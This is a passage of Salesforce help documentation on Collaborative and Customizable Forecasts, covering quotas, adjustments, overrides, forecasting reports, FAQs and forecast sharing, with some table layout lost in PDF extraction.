Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

From your own forecasts page or the page of any subordinate, you can edit the opportunities that contribute to a forecast.
When you finish, refresh the forecasts page to see your updates.
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Tip:  To quickly find a forecast, click Jump to....

1. On your forecasts page, find the opportunity you want and click Edit.
2. Edit the opportunity and click Save.
3. On the forecasts page, click Refresh to see the changes in the Opportunities list and the forecast table.

See Also:
Viewing Opportunity Details from a Forecast
Finding Forecasts with Jump to...

Understanding Adjustments Purges
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

An adjustment shows a forecasts manager’s judgment about the final amount she or he expects the forecast's opportunities to
bring in at the close of the forecast period. Forecasts managers can adjust forecasts that include gross opportunity amounts
only and also adjust forecasts that have already been adjusted by someone else in their opportunity team. Remember that an
adjustment doesn't change the underlying gross rollup—it just adds a layer of detail. Adjustments can be purged from forecasts;
when this occurs, the underlying data on which the forecasts were based remains untouched. Adjustment purges happen if:

• Your administrator disables Forecasts.
• Your administrator disables adjustments.
• You are no longer a forecast manager; only adjustments you made are purged.
• You are removed from a role that’s set as a forecast manager in the forecast hierarchy; only adjustments you made are

purged.
• Your administrator changes your organization’s date range period setting from quarterly to monthly or monthly to quarterly.
• Your administrator disables a data source, such as revenue or quantity.

See Also:
Forecasts Adjustments Overview
Adjusting Forecasts
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Adding and Editing Quotas
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

You can track your sales quotas on a quarterly basis. To add or edit a quota, go to your forecast for the quarter, or go to your
personal information page in your personal settings.

To create a new quota from the personal information page:

1. Click New in the Quotas related list.
2. Select the year and quarter, and click Next.

By default, the page displays the quarter that follows the last quota you created. The year you select should be based on
your organization’s Fiscal Year Starts In settings.

3. Enter amounts for each month. Do not include any currency symbols. If your organization uses multiple currencies, your
quota is created in your personal currency by default.

4. Click Save to finish. Creating a quota automatically creates the corresponding forecast for that quarter.

To edit a quota, click the quota name in the Quotas related list. Editing the quota amounts automatically logs an entry to the
Forecast History related list of the corresponding forecast (see Forecast History on page 1213).

Note:  Managers should enter their quota amounts as a sum of their entire team’s quotas.

If your sales group does not break down quotas monthly, enter zeroes for the first two months and put the entire
amount in the third month.

If your organization uses multiple currencies, click Change Currency in the Quotas related list to change the currency of the
quota. All quota and forecast values are automatically converted to the new currency using the conversion rates maintained by
your administrator.

See Also:
Displaying and Editing Forecasts
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Showing or Hiding Quota Information
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”

AND

“Manage Quotas”

To use quotas:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You can show or hide quota data on your forecast page. To show quota data:

1. Click Display Options.
2. Select Show quotas column to show your quota amount for each period.
3. Select Show quotas % attainment to show your quota attainment for a specific category in a selected period.

The quota information displayed is based on your data source—either revenue or quantity. To hide quota information, return
to Display Options and deselect these options.

Tip: Hover and click on a column boundary and adjust the width to view data more easily.

See Also:
Forecasts Quotas Overview
Enabling Quotas in Forecasts

Working with Multiple Currencies in Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

This information assumes that your organization uses multiple currencies.

When an administrator sets up Forecasts for an organization, a forecast currency and data source are selected. The forecast
currency is either the organization's corporate currency or each forecast owner's personal currency. The data source is the type
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of data used for forecasting. Depending on an organization’s settings, quantity- or revenue-based data sources, or both, can
be used.

When you use Forecasts, you also select a display currency, which can be any currency enabled by the organization. At the top

of the Forecasts page, click  next to Amounts in Currency Type or Quantity (Units). Under Currency, click (Change). A
currency selection box opens for selecting a forecast display currency.

When working with currencies in Forecasts, keep the following in mind.

• If you use revenue as your data source, when currency rates change, opportunities and adjustments roll up with the changed
value along with values in the forecast table.

• If you use quantity as your data source, when currency rates change, opportunities and adjustments roll up with the changed
value.

• The processing indicator ( ) displays as changed values roll up.
• All forecast periods (historical, current, and future) are impacted by rate changes.

• Deactivating a currency that is set as a user’s personal currency automatically resets the user’s currency to the corporate
currency.

Users can edit their personal currency settings by editing their personal information.

See Also:
Forecasts Adjustments Overview
Understanding the Elements of a Forecast
Changing Your Data Source

Refreshing Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

While you're viewing a forecasts page, your subordinates may be editing related opportunities or adjusting the forecasts of
their own subordinates. Or you might be adjusting one of your subordinates' forecasts from your own page. All of these events
can change forecast amounts.

When any opportunity update or forecast adjustment occurs for a forecast you've selected in a rollup table, we let you know.

• If the selected forecast has adjustments in process (your own or your subordinate's), you'll see a processing indicator ( )
next to the forecast.

• If any of the selected forecast's related opportunities have been updated, you'll also see the processing indicator in the
header of the opportunities list.

• A message, Processing Changes, appears in the opportunities list header.

To see the changes, you need to click Refresh.

1188

Refreshing ForecastsPredicting and Planning Sales Cycles with Collaborative
Forecasts



For example, while Gordon Johnson is viewing his team's forecasts for December, his subordinate Renee Reynolds edits an
opportunity she expects to close in December. The opportunity is currently in the Commit forecast category. Renee changes
the opportunity amount from $2500 to $2600. This change affects her December forecast, increasing the amount by $100.

When Gordon clicks the forecasts table cell for Renee's December commit forecast, the processing indicator appears within
that cell. The indicator tells him that Renee made a change that affects the forecast. He sees the same processing indicator on
the opportunities list, so he knows Renee edited an opportunity. He clicks Refresh. The opportunity amount changes from
$2500 to $2600, and Renee's Commit forecast for December reflects the $100 increase.

See Also:
Forecasts Adjustments Overview
Understanding Adjustments Purges

Using Forecasting Reports
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Allow Forecasting”To use Forecasts:

“Run Reports”To view the Reports tab:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

To see if your organization has forecasts reports, go to the Reports tab and click New Report.... Select the folder in which
your administrator has placed the forecasting report types. If you don’t see the fields or report type names described in the
table, check with your administrator.

When using the reports, follow the best practices described here.

Do thisIf you want to view

Create a Forecasting Item report and add a filter using Owner:
Full Name. Filter by a specific person’s name.

A forecast summary from a specific user’s perspective.

Add Owner Only Amount to your Forecasting Item report.
For example, if you own two opportunities, each worth

The sum of all of a person’s revenue opportunities, without
adjustments.

$10,000, the Owner Only Amount is $20,000. To view the
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Do thisIf you want to view

same information, but for quantity, add Owner Only Quantity
to the report.

Add Amount Without Adjustments to your Forecasting Item
report. For example, if the sum of the amount of all

The sum of all of a person’s owned revenue opportunities and
also his or her subordinates’ opportunities, without

opportunities owned by you is $20,000 and the sum of theadjustments. Subordinates include everyone reporting up to
a person in the forecast hierarchy. amount of your subordinates’ opportunities is $55,000, the

Amount Without Adjustments is $75,000. To view the same
information, but for quantity, add Quantity Without
Adjustments to the report.

Add Amount Without Manager Adjustments to your
Forecasting Item report. For example, say Anne has an Amount

The forecast number as seen by the forecast owner. This is
the sum of the owner’s revenue opportunities and his or her

Without Adjustments of $75,000, made up of $20,000 of hersubordinates’ opportunities, including adjustments made on
own opportunities and $55,000 of opportunities owned by herthe subordinates’ forecasts.  It doesn’t include adjustments made

by forecast managers above the owner in the forecast hierarchy. subordinate Ben. Additionally, she adjusted Ben’s amount to
$65,000 for a total of $85,000. If you adjust Anne’s number
from $85,000 to $100,000, then you see $85,000 in Amount
Without Manager Adjustments because this is what Anne
sees (and Anne can’t see your adjustments as you’re her
manager). To see the amount that includes your adjustment to
$100,000, look at Forecast Amount. To view the same
information, but for quantity, add Quantity Without Manager
Adjustments to the report.

Add Forecast Amount to your Forecasting Item report. For
example, say you’re a forecast manager and have another

The revenue forecast from the forecast manager’s perspective
and the sum of the owner’s and subordinates’ opportunities,
including all forecast adjustments. forecast manager reporting to you who has an  Amount

Without Manager Adjustment totaling $85,000. If you adjust
the forecast to $100,000, the Forecast Amount is $100,000.
To view the same information, but for quantity, add Forecast
Quantity to the report.

Add Has Adjustment to your Forecasting Item report. For
example, if you make an adjustment to one of your

Whose forecast amounts have adjustments made to them.

subordinate’s forecast amounts, this box is checked. If your
subordinate makes an adjustment to one of his or her
subordinate’s amounts, this box is also checked. However, unless
you have the “View All Data” permission, if your forecast manager
makes an adjustment to your forecast amount, this box remains
unchecked; you don’t have access to your forecast manager’s
adjustment information.

Create a Forecasting Quotas report. For example, depending
on how your administrator set up the report type, you can

Quota detail for your forecasts.

include fields, such as the full name of the quota owner. You
can then filter by your own name to see quotas you created and
their related accounts and owners.
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Important:  Reports contain the latest information at the time you run the report., so if you see a difference between
your report amounts and the Forecasts pane, it may be because changes were in process while the report was running.
Additionally, keep in mind that the data you see in reports depends on what you can view in Forecasts. For example,
forecast managers can view adjustments made, but a non-forecast manager running a similar report won’t see the
adjusted amounts in reports. Since a forecast amount can consist of a rollup of many users’ forecast amounts, examine
report results closely when using summary fields.

Forecasts Best Practices
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Consider the following best practices when using Forecasts:

• Track important details at the opportunity level.

• Measure everything related to potential deals—activities like emails, meetings, and outreach—to determine their contributions
to revenue.

• Create actionable tasks with next steps and completion dates pertaining to opportunities.

• Map your sales stages to forecast categories; adjust close probability based on historical data to increase your forecast
accuracy.

• Customize your forecast category names to match your business process and terminology.

• Create dashboards for metrics of all activities related to potential sales.

• When adjusting forecasts, have conversations with your subordinates so that they understand your expectations.

• Use Chatter to share opportunity and forecast information with your team and bring attention to important details.

• Run reports to analyze trends and check performance.

See Also:
Forecasts Overview
Using Forecasting Reports

PREDICTING AND PLANNING YOUR SALES CYCLES WITH
FORECASTS FAQS

Forecasts FAQ
• What's the difference between the Forecasting features?
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• Can I adjust my own forecast?

• Why can’t I adjust forecasts?

• What determines whose forecasts I can adjust?

• Why don’t I see any opportunities on my forecast page?

• Why can’t I use territory management?

• How do I view and update the forecasts categories and opportunity stage mappings?

• Why don’t I see the “Jump to...” link on my forecast page?

• How do I set up quotas for my sales reps?

See Also:
Forecasts Overview

What's the difference between the Forecasting features?
Collaborative Forecasts includes much of the same functionality as Customizable Forecasts.

Use the following table to see what features are available in each version of Forecasting. If your organization is migrating to
Collaborative Forecasts, see Planning Your Migration from Customizable Forecasting to Forecasts on page 1168.

Collaborative ForecastsCustomizable ForecastsFeature

API Access

Automatic Rollups

Chat in Real Time

Custom Fiscal Years

Default Forecast Currency Setting

Expand Forecast Tables

Individual Forecast Range Selection—Controlled by User

Map Forecast Categories to Opportunity Stages*

Monthly Forecasts

Multiple Currency Support

Opportunity-level Adjustments

Opportunity List Filters and Sort

Opportunity Stage

Override (Adjust) Forecasts

Partner Opportunities in Forecasts
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Collaborative ForecastsCustomizable ForecastsFeature

Product Family Forecasts

Quotas

Quantity Forecasts

Quarterly Forecasts

Rename Categories

Reports and Dashboards

Revenue Forecasts

Share Forecasts

Snapshots and Forecast History

Sortable Opportunities List From the Forecast Page

Submit Forecasts

Territory Management

* In Customizable Forecasts, the forecast categories can reflect aggregate information; for example, Pipeline contains amounts
for all open opportunities (excluding omitted). In Collaborative Forecasts, the forecast categories only display information for
that specific category; for example, Best Case only reflects amounts in the Best Case category.

See Also:
Forecasts FAQ

Can I adjust my own forecast?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Non-forecasts managers can’t adjust any forecasts. Forecasts managers can adjust forecasts of subordinates who report to them
in the hierarchy and not their own forecasts.

See Also:
Why can’t I adjust forecasts?
Adjusting Forecasts
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Why can’t I adjust forecasts?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be a forecast manager to adjust forecasts. If you recently changed job functions, check the forecasts hierarchy to see
if you’re still a forecast manager. From Setup, click Customize > Forecasts > Forecasts Hierarchy. If you’re a forecast manager,
your name appears next to a role that’s assigned as a forecast manager. Remember that you can’t adjust your own forecast.

See Also:
Can I adjust my own forecast?
Forecasts Adjustments Overview

What determines whose forecasts I can adjust?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

The forecasts hierarchy determines whose forecasts you can see and adjust. Even if someone reports to you in the role hierarchy,
you can’t adjust that person’s forecast unless he or she reports to you in the forecasts hierarchy.

See Also:
Can I adjust my own forecast?
Why can’t I adjust forecasts?
Forecasts Adjustments Overview

Why don’t I see any opportunities on my forecast page?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Try one of the following. If you want to:

• View opportunities in all forecast categories for a month or month range, click its table row. All opportunities in all
categories appear in the opportunities list.

• View opportunities in any single forecast category for a single month or month range, click its cell within the row. The
opportunities in that category appear in the opportunities list.

Tip:  Remember that the forecast category is dependent on the opportunity stage. To change your forecast category
without updating the opportunity stage, go to the opportunity detail page. If your administrator added the
Forecast Category field to your page layout, you can click it to open a selection box. In the box, use the
Forecast Category drop-down list to update your forecast category.
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• View the opportunities of a subordinate within a single month, click the subordinate's row within that month.

• Sort the opportunities list, click the header of any column. Most columns are sorted alphanumerically, but the Category
column is sorted by closest to or furthest from closing.

• Move through a list that's longer than a page, click Previous and Next or enter a page number in the Page field.

• Edit an opportunity that appears in the list, click Edit next to its name.

• See any Chatter posts related to the opportunity, click the opportunity's Opportunity Name link to go to its detail page.
Click Show Feed. Click Follow if you want Chatter notifications about all of the opportunity's activity.

See Also:
Viewing Opportunity Details from a Forecast

How do I view and update the forecasts categories and
opportunity stage mappings?

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be an administrator to update forecasts categories and opportunity stage mappings.

1. From Setup, click Customize > Opportunities > Fields.
2. Click Stage.
3. Scroll down to Opportunity Stages Picklist Values and look at the row for each stage to see what forecast category it’s

mapped to; click Edit to edit a mapping.

See Also:
Forecasts FAQ

Why don’t I see the “Jump to...” link on my forecast page?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

You must be a forecasts manager and have forecasts users reporting to you in the forecasts hierarchy to see Jump to....

See Also:
Forecasts FAQ
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How do I set up quotas for my sales reps?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

If you have the correct permissions, you can set up quotas for your organization:

1. From Setup, click Customize > Forecasts > Settings.
2. Under Quotas, select Show Quotas.
3. Click Save.
4. To load quota data, use either API version 25 or later, or the Data Loader.

See Also:
Forecasts Quotas Overview
Showing or Hiding Quota Information

Why can’t I use territory management?
Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Territory Management is available for Customizable Forecasting and not Collaborative Forecasts.

See Also:
Forecasts FAQ

ESTIMATING REVENUE AND SALES WITH CUSTOMIZABLE
FORECASTS

Customizable Forecasting Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).
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Customizable forecasting is a flexible solution for estimating how much revenue your organization can generate or how many
items your organization can sell. You can set up customizable forecasting to reflect how your organization forecasts its sales.
With it, you can forecast on a monthly or quarterly basis, use different dates when applying amounts to forecasts, forecast
based on revenue or quantity or both, and define additional quotas based on product families.

Use customizable forecasts to review your forecast and drill down through your forecast amounts to see the opportunities
included in your forecast. Override forecast amounts directly from the opportunity, or override the forecast from the Forecasts
tab without notifying users below you in the forecast role hierarchy.

For information on implementing customizable forecasting for your organization, see Setting Up Customizable Forecasting.

See Also:
Do I Have Customizable Forecasting?
What's the difference between the Forecasting features?

Do I Have Customizable Forecasting?

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Customizable forecasting may be difficult to distinguish because the tab name does not change when you convert to customizable
forecasting. Here's how to tell if you have it:

Click the Forecasts tab.

• If you see either the Introducing Customizable Forecasting or Request Now! buttons, you don't have customizable
forecasting.

• If you don't see either button, your organization already has customizable forecasting.

To enable customizable forecasting:

1. From Setup, click Customize > Forecasts (Customizable) > Forecasts Hierarchy > Enable Customizable Forecasting.
2. Once customizable forecasting is enabled, see Setting Up Customizable Forecasting.

See Also:
Customizable Forecasting Overview
What's the difference between the Forecasting features?
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Setting Quotas for Customizable Forecasting
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Personal Quota”To set your quota:

“Manage Users”To set any user’s quota:

Users with the appropriate permission can set their individual quota. Administrators and users with the appropriate permission
can always edit any quota, and managers can always change the quotas of users that report directly to them in the role hierarchy.

1. Do one of the following:

• To set your personal quota, access your personal information in your personal settings.
• To change the quota of a user that reports to you, from Setup, click Manage Users > Users, and select the appropriate

user.

2. Click Edit in the Quotas related list.
3. Select the appropriate range start and range length. If available, select a territory and product family.

Note:  If your organization uses custom fiscal years, you cannot set quotas for a period that does not have a defined
fiscal year.

4. Enter the quota amounts for revenue and/or quantity.
5. Select the appropriate currency if you work with more than one currency.
6. Click Save to save the quota and return to the user detail page, or click Quick Save to save the values and continue to edit

the quota.

Tip:  Using Quick Save allows you to quickly set a different quota for each product family.

Note:  If these options are not available to you, you may not have customizable forecasting. To determine if your
organization has enabled customizable forecasting, see Do I Have Customizable Forecasting? on page 1197. For
information on setting quotas if you do not have customizable forecasting, see Adding and Editing Quotas on page
1214. Delegated administrators won’t see the quotas related list on user records.

You can also use tools like the Data Loader to do mass updates on quotas. When updating quotas, set the quota field value
on the RevenueForecast or QuantityForecast objects.

See Also:
Customizable Forecasting Overview
Managing Customizable Forecasts
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Working with Forecast Categories
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Your forecast is a representation of your opportunity amounts, dates, and stages. Click the Forecasts tab and notice that your
forecast amounts are listed in different categories. Depending on its stage, an opportunity amount can be included in the
following forecast categories:

• Best Case includes amounts you are likely to close, closed/won opportunity amounts, and amounts in the Commit category.

• Closed includes amounts for closed/won opportunities.

• Commit includes amounts you are confident about closing and closed/won opportunity amounts.

• Omitted means the amount does not contribute to your forecast.

• Pipeline includes amounts from all open opportunities.

Note:  You can edit the forecast category field on opportunities to change the value displayed in reports, opportunity
detail and edit pages, opportunity searches, and opportunity list views. For example, you can change the value of the
Commit category to Won to make the category name match your business processes.

Each value in the opportunity Stage picklist is automatically mapped to a Probability and value in the Forecast
Category picklist. Change the Stage of an opportunity and the Probability as well as the Forecast Category changes
with it.

For example, your organization may have mapped the “Negotiation/Review” stage to the “Best Case” forecast category. This
means that the amounts of your opportunities in “Negotiation/Review” are included in your “Best Case” forecast amount.
Your organization may have set up different mappings but an example of how these fields map is below:

Forecast CategoryProbabilityStage

Pipeline10%Prospecting

Pipeline10%Qualification

Pipeline20%Needs Analysis

Pipeline50%Value Proposition

Pipeline60%Id Decision Makers

Pipeline70%Perception Analysis

Pipeline75%Proposal/Price Quote

Best Case90%Negotiation/Review

Commit100%Closed Won

1199

Working with Forecast CategoriesEstimating Revenue and Sales with Customizable Forecasts



Regardless of whether you use customizable forecasting or not, your forecasts still rely on how your opportunity Stage picklist
values map to values in the Forecast Category picklist.

See Also:
Customizable Forecasting Overview
Managing Customizable Forecasts

Customizable Forecasting Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View All Forecasts”To see forecasts of other users:

“Override Forecasts”To override your forecast:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Clicking the Forecasts tab displays your forecast for the selected forecast period.

• Click Submit to submit a forecast, making a snapshot of the forecast data available in the forecast history and forecast
reports. See Submitting Customizable Forecasts.

• Click Forecast History to display the forecast data you submitted in the past. Then, click Forecast Summary to return
to the current forecast data.

• Click Printable View to display the selected forecast in a simple, print-ready layout.

• Review your forecast and the forecasts of any direct reports or forecasts that are manually shared with you. See Viewing
Customizable Forecasts for instructions on different viewing options.

• Click the Forecast subtab to see forecast details. See Viewing Customizable Forecasts for more information.

• Click the Opportunities subtab to see the opportunities that are included in the displayed forecast. On the Opportunities
subtab, you can choose, or create, a list view to further filter the displayed opportunities. See Viewing Customizable
Forecasts for more information.

• Click the edit icon ( ) to make changes to the adjusted forecast total, or to add an override to a particular forecast amount.
For instructions on overriding forecast amounts, see Overriding Customizable Forecasts.

If your forecast is not available, contact your administrator about adding you to the forecast hierarchy (or the territory hierarchy,
if your organization uses territory management).
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Note:  The Forecasts tab is unlike other tabs in that it automatically calculates data for you based on your opportunity
data. You do not need to create or delete forecast records.

See Also:
Do I Have Customizable Forecasting?
Managing Customizable Forecasts

Managing Customizable Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View All Forecasts”To see forecasts of other users:

“Override Forecasts”To override your forecast:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Your forecasts represent your opportunity amounts, dates, and stages. To make sure your forecasts are an accurate representation
of your revenue potential:

1. Review your forecast amounts. See Viewing Customizable Forecasts for instructions on different viewing options.
2. Determine if you want to override any amounts.
3. Override amounts if necessary. This requires the appropriate user permission. See Overriding Customizable Forecasts on

page 1204.
4. Submit your forecast to make a snapshot of your forecast data available in your forecast history and forecast reports. See

Submitting Customizable Forecasts.
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Viewing Customizable Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View All Forecasts”To see forecasts of other users:

“Override Forecasts”To override your forecast:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

When you click the Forecasts tab, review the amounts listed and determine if they are ready to be submitted.

• Initially, your name appears in the title bar and above Find a Forecast:, indicating that you are viewing your own
forecast. Users with the appropriate permissions can click the magnifying glass icon and select another user or role to view
that person’s forecast. When you are viewing a forecast other than your own, the role or username will be displayed in the
title bar and above Find a Forecast:. In addition, your access level will be displayed above Find a Forecast:.

Note: User Sharing does not fully support Customizable Forecasting. You’ll see all users in the organization
regardless of the organization-wide default for the user object.

• If you organization uses manual forecast sharing, click Sharing to view the forecast sharing settings or to share the forecast
with other users.

• If your organization uses territories, choose an option from the Territory picklist to summarize the forecast by that
territory. See Territory Management Overview.

• If your organization uses product families, choose an option from the Product Family picklist to summarize the forecast
by that product family. Choosing --All-- product families disables the Submit, and Forecast History options; choose
another product family to use these options. See Defining Customizable Forecast Settings for information on customizing
your organization to use product families.

• If your organization forecasts on both revenue and quantity, select whether to include revenue, quantity, or revenue and
quantity. This controls which information is displayed for each amount listed.

• Select a date range under Range Start to view another forecast period. Forecast details for opportunities that closed
more than two years before you implemented customizable forecasting or more than 10 years in the future are not available.

Note:  Organizations that implemented customizable forecasting prior to the Salesforce Winter '07 release can
see forecasts outside of this range.

• Select a Range Length to view fewer or more forecast periods.

Note:  If you are using custom fiscal years, periods before the first defined custom fiscal year or after the last
defined fiscal year use calendar months or calendar quarters (depending on your forecast setting) for the range
start and period length.
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• Select an option next to Display Units to view forecast totals using a different unit of measurement. To display what
portion each total is of your quota, choose % Quota.

Viewing Forecast History

When viewing a forecast from the Forecasts tab, click Forecast History to view snapshots of your forecast data taken when
you submit it. You can also view the submitted forecasts of subordinates users. Click Forecast Summary to return to the
previous view.

Viewing Forecast Amount Details

Select the Forecasts subtab to see forecast details. Click any forecast amount to view details of the opportunity amounts included
in that forecast amount. From the details page, click any item listed to view it. Click Edit to override that item. See Overriding
Customizable Forecasts for instructions on overriding forecast amounts from the opportunity.

If you have direct reports (users that report directly to you), their forecasts display below yours. The Choose a view option
allows you to change the way forecast information is displayed for your direct reports. Use this option to group forecast data
by subordinate or forecast period.

• View by Period displays a list of direct reports and their forecasts for each forecast period. Click any name to view the
forecast for that user.

• View by Direct Report displays a list of forecast totals for each direct report. Click View next to any subordinate name to
view the forecast for that user.

• Clicking any amount displays the opportunities and forecast overrides included in that amount.

Viewing Opportunities

Select the Opportunities subtab to see the opportunities that are included in the displayed forecast. On the Opportunities
subtab, you can choose, or create, a list view to further filter the displayed opportunities. Click any opportunity to see the
opportunity details. To override the opportunity, click Edit. For more information on overriding opportunities, see Overriding
Customizable Forecasts.

Note:  When a partner portal is transferred to another account, the opportunities on each account are automatically
recalculated through your organization's forecast hierarchy.

See Also:
Customizable Forecasting Overview
Managing Customizable Forecasts
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Overriding Customizable Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View All Forecasts”To see forecasts of other users:

“Override Forecasts”To override your forecast:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

You can make your forecast a more accurate assessment of your forecasted sales by overriding forecast amounts as needed. Any
user can override a forecast from the opportunity by changing the Stage or Forecast Category of the opportunity. Users
with the “Override Forecasts” permission can override their forecast or any direct report’s forecast at the forecast level.

Overriding Your Forecast from the Opportunity

1. Click the Opportunities subtab on the Forecasts page.
2. Click Edit for the opportunity you want to override.
3. Make any changes to the details. The options available differ depending on whether you own the opportunity.
4. If products are on the opportunity and you want to change the forecast category for that product, select Change Category,

then select the appropriate Product Forecast Category.
5. Click Save. The opportunity is marked with the appropriate icon indicating its override status. For a description of each

override icon, see Forecast Override Indicators.

Click Save & Refresh to update the record and redisplay the totals.

Overriding Your Forecast Total

1. Click the Forecasts subtab on the Forecasts page.

2. Click the edit icon ( ) to override the adjusted total.
3. Enter a new amount and any comment.
4. Click Save. The forecast is marked with the appropriate icon indicating its override status. For a description of each override

icon, see Forecast Override Indicators.

Overriding the Forecast of Your Direct Reports

1. Click the Forecasts subtab on the Forecasts page.

2. Click the edit icon ( ) to override your direct report's forecast.
3. Choose one of the override options to control which override amounts, if any, are included in the forecast:

• Accept John Doe’s forecast—Use this option to accept the forecast of your direct report, including any overrides that
he or she has made.

• Reject any override on John Doe’s forecast, but accept forecast overrides from other subordinates—Use this option
to ignore overrides made on your direct report's forecast, but include any overrides made on forecasts further down in
the hierarchy.
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• Reject all forecast overrides—Use this option to ignore all forecast-level overrides but include opportunity-level
overrides. If you have overridden amounts at the opportunity, your own opportunity forecasts are used in this calculation.
Choose this option if you want forecast amounts to be based on opportunity amounts including overrides made at the
opportunity level.

• Override the forecast and set it to—Use this option to enter an amount that replaces the current amount in your
forecast. Your manager will see this amount in your forecast but your subordinates will not.

4. If you forecast on both revenue and quantity, choose an override option for quantity forecast.
5. Click Save. The forecast is marked with the appropriate icon indicating its override status. For a description of each override

icon, see Forecast Override Indicators.

Note:  The Forecasts tab is unlike other tabs in that it automatically calculates data for you based on your opportunity
data. You do not need to create or delete forecast records.

See Also:
Customizable Forecasting Overview
Managing Customizable Forecasts

Forecast Override Indicators
Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

An icon displays for each override to indicate the status of the override. Use the following table to determine the status of an
override.

Override StatusIcon

The opportunity has been updated since an override.

A subordinate has overridden the forecast.

A person that reports directly to you has overridden the
forecast.

You have overridden the forecast.

The forecast data is not up-to-date. Refresh your browser in
a few minutes.

See Also:
Overriding Customizable Forecasts
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Customizable Forecast Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Here is a description of the fields (in alphabetical order) that make up a forecast in customizable forecasting:

Forecast Fields

DescriptionField

The comments you enter when overriding your forecast.Comments

Category determined by the opportunity Stage value. Options
are:

Forecast Category

• Omitted means the amount does not contribute to your
forecast.

• Pipeline includes amounts from all open opportunities.
• Best Case includes amounts you are likely to close,

closed/won opportunity amounts, and amounts in the
Commit category.

• Commit includes amounts you are confident about closing
and closed/won opportunity amounts.

• Closed includes amounts for closed/won opportunities.

Record that contributes to the forecast. This displays in the
detail of a forecast amount.

Forecast Item

The total expected revenue amount from the opportunities
that fit in a given category.

Revenue

The total number of units that are forecasted to sell as part of
the opportunities in a given category.

Quantity

The amount you enter when overriding a forecast amount.My Forecast Override

The user who submitted a forecast.Submitted By

Type of override. Options are “Opportunity” or “Forecast
Override.”

Type

Opportunity Forecast Fields

DescriptionOpportunity Forecast Field

The amount you enter when overriding your direct report’s
opportunity amount.

My Forecast Amount
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DescriptionOpportunity Forecast Field

The category selected when you override the category of an
opportunity.

My Forecast Category

The comments you enter when overriding one of your
opportunities or the opportunity of a direct report.

My Forecast Comments

The period you selected when overriding a direct report’s
opportunity period.

My Forecast Period

See Also:
Managing Customizable Forecasts

Manually Sharing a Forecast
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Your administrator defines your organization's forecasting hierarchy, which determines which users can view the forecast data.
However, your administrator can manually extend sharing privileges for forecast data, and you may be able to manually extend
sharing privileges for your own forecast data as well. Manual forecast sharing can only increase access to forecast data; it cannot
restrict access for users who already have access. To manually share a forecast, you must be an administrator or a forecast
manager who has been given access to share your forecast data.

To see which users can view your forecast or to share your forecast data, do one of the following:

• From Setup, click Customize > Forecasts > Forecast Hierarchy, then click Share next to the view you want to share.

• Click Sharing on the forecast home page to share your own forecast data.

The User and Group Sharing list shows you all the users who currently have access to this forecast data. It also details the level
of access they have, whether they can submit a forecast, and the reason they have that access. The reasons a user might have
access to forecast data are:

DescriptionReason

The user is an administrator, or has the “Modify All Data”
permission.

Administrator

A user has access to forecast data that was granted via the
Sharing button on the forecast.

Delegated Forecast Manager

A user has access due to being a forecast manager in the
forecast hierarchy.

Forecast Manager

The owner can always see his or her own forecast data.Owner
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DescriptionReason

The user has the “View All Forecasts” permission.View All Forecasts Permission

On the Forecast Sharing Detail page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
